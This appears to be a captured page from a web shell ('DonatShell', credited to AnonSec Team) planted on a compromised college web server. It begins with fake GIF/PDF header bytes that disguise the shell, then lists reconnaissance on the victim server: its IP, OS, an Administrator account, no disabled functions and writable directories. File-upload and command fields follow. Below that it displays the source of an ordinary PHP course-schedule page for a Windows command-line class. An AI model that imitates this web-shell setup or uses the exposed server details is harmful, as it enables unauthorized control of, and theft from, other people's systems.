GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/_Archive/CST1861/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/_Archive//CST1861/Schedule.php
<?
// JimMartinson/CST1861/Schedule.php

$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";
ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
$thisFile=__FILE__; $thisLine=__LINE__; include('application.phpinc');
$thisFile=__FILE__; $thisLine=__LINE__; include('Course/courseInfo.phpinc');
$thisFile=__FILE__; $thisLine=__LINE__; include('classInfo.phpinc');
$title = "Schedule";
$headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title;
$pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title;
$pageMenu = 'Course/courseMenu.phpinc';
$thisFile = __FILE__; $thisLine=__LINE__; include('common/pageHeader.phpinc');
$thisFile=__FILE__; $thisLine=__LINE__; include('Login/authenticate.phpinc');
$sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title;
$thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionHeader.phpinc');
$week = 0;
?>
<fieldset><legend>Schedule</legend><span class="normal">
	<br /><? include ('JimMartinson/WebExLink.phpinc'); ?>
	<br />WebEx recordings of classes or demonstrations are available <a href="WebExRecordings">here</a>.
	<br /><br />
	<ol start="1">
		<!-- Week 1 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Tuesday: Discuss the mechanics of the class, the class syllabus, remote classroom, and the personalized option.
			<br />Thursday: Work one-on-one with students to ensure they have their Windows 7 virtual machine installed.
			<br />Complete the assignment "<a href="Assignment_01.php">Part I - Windows Command-Line Fundamentals</a>" <?=classDueDate(1,$class['StartDate'],$week+1)?>.
			<br />Complete the assignment "<a href="./?StudentProfile">Student Profile</a>" <?=classDueDate(0,$class['StartDate'],$week+2)?>.
			<br />Complete the assignment "<a href="./?ClassProfile"><?=$courseNumber?> Class Profile</a>" <?=classDueDate(0,$class['StartDate'],$week+2)?>.
		</li>
		<!-- Week 2 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Tuesday: Discuss an Overview of the Windows Command Line, Getting the Most from the Command Line, and Command-Line Scripting Essentials.
			<br />Thursday: Work one-on-one with students to ensure they have their Windows 7 virtual machine installed.
		</li>
		<!-- Week 3 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Tuesday: Continue discussion of an Overview of the Windows Command Line, Getting the Most from the Command Line, and Command-Line Scripting Essentials.
			<br />Thursday: Continue discussion of Command-Line Scripting Essentials.
		</li>
		<!-- Week 4 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Tuesday: Discuss Lab 1: SysInfo.cmd: directory exists.
			<br />Continue discussion of Command-Line Scripting Essentials.
		</li>
		<!-- Week 5 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Finish discussion of Command-Line Scripting Essentials.
			<br />Complete the <a href="Lab02.php">Lab 2</a> assignment <?=classDueDate($class['meetingTime'],$class['StartDate'][1],$week+3)?>.
		</li>
		<!-- Week 6 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Tuesday: Discuss basic commands (ASSOC, ATTRIB, BREAK, CACLS (ICACLS), CALL, CD, CHCP, CHDIR, and CHKDSK).
			<br />Thursday: Discuss the CHKNTFS, CLS, CMD, COLOR, COMP, COMPACT, CONVERT, COPY, DATE, DEL, DIR, DISKCOMP, DISKCOPY, DOSKEY and DRIVERQUERY commands.
		</li>
		<!-- Week 7 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Tuesday: Discuss the ECHO, ENDLOCAL, ERASE, EXIT, FC, FIND, FINDSTR, FOR, FORMAT, FSUTIL, FTYPE, GOTO, GPRESULT, GRAFTABL, HELP, ICACLS, IF, LABLE, MD, MKDIR, MODE, and MOVE commands.
      <br />No class meeting today.
		</li>
		<!-- Week 8 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Tuesday: Discuss the OPENFILES, PATH, PAUSE, POPD, PRINT, PROMPT, PUSHD, RD, RECOVER, REM, REN, RENAME, REPLACE, RMDIR, ROBOCOPY, SET, SETLOCAL, SC, SCHTASKS, SHIFT, SHUTDOWN, SORT, START, SUBST, SYSTEMINGO, TASKLIST, TASKKILL, TIME, TITLE, TREE, TYPE, VER, VERIFY, VOL, XCOPY, and WMIC commands.
			<br />Thursday: No class meeting today. Work on <a href="Lab02.php">Lab 2</a>.
			<br />Complete the assignment "<a href="Assignment_02.php">Part II First half - Windows System Administration Using the Command Line</a>" <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+2)?>.
		</li>
		<!-- Week 9 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br /><b>No class this week.</b> Spring Break.
		</li>
		<!-- Week 10 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Tuesday: Discuss the Lab 2 scripts.
      <br />Thursday: Continue to discuss the Lab 2 scripts.
		</li>
		<!-- Week 11 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Tuesday: Continue to discuss the Lab 2 scripts.
			<br />Thursday: No class today. I have an Advisory board meeting.
		</li>
		<!-- Week 12 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Tuesday: Continue to discuss the Lab 2 scripts. Discuss Managing Windows Systems.
      <br />Thursday: Discuss Event Logging, Tracking, and Monitoring.
			<!-- <br />Complete the assignment "<a href="Assignment_03.php">Part II Second half - Windows System Administration Using the Command Line</a>" <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>. -->
		</li>
		<!-- Week 13 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Tuesday:
      <br />Thursday: 8:45am CCSSE survey. <b>Please attend class physically</b>, not through WebEx. The 1:30pm and 3:00pm classes will not have a lecture today. I will be available to help with scripts and answer questions.
			<br />Complete the assignment "<a href="Assignment_04.php">Part III - Windows File System and Disk Administration Using the Command Line</a>" <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>.
		</li>
		<!-- Week 14 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Tuesday:  
      <br />Thursday: 
			<br />Complete the <a href="Lab03.php">Lab 3</a> <span style="text-decoration:line-through;">assignment <?=classDueDate($class['meetingTime'],$class['StartDate'][1],$week+1)?></span>. <b class="error">This assignment is now due before 8:30am on Tuesday, 04/27.</b>
		</li>
		<!-- Week 15 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Tuesday:  
      <br />Thursday: 
			<!-- <br />Complete the assignment "<a href="Assignment_05.php">Part V - Windows Network Administration Using the Command Line</a>" <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>. -->
		</li>
		<!-- Week 16 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Tuesday:  
      <br />Thursday: 
		</li>
		<!-- Week 17 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Tuesday: Complete the <a href="Lab04.php">Lab 4</a> This assignment is now due before 5:00pm on Thurday, May 13th.</b> 
      <br />Thursday: 
		</li>
		<!-- Week 18 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br /><b>No class this week.</b> Spring Break.
		</li>
<?
?>
	</ol>
</span></fieldset>
<?
$thisFile=__FILE__; $thisLine=__LINE__; include('ReferencesResources.phpinc');
$thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionFooter.phpinc');
$thisFile = __FILE__; $thisLine=__LINE__; include('common/pageFooter.phpinc');
?>

Anon7 - 2022
AnonSec Team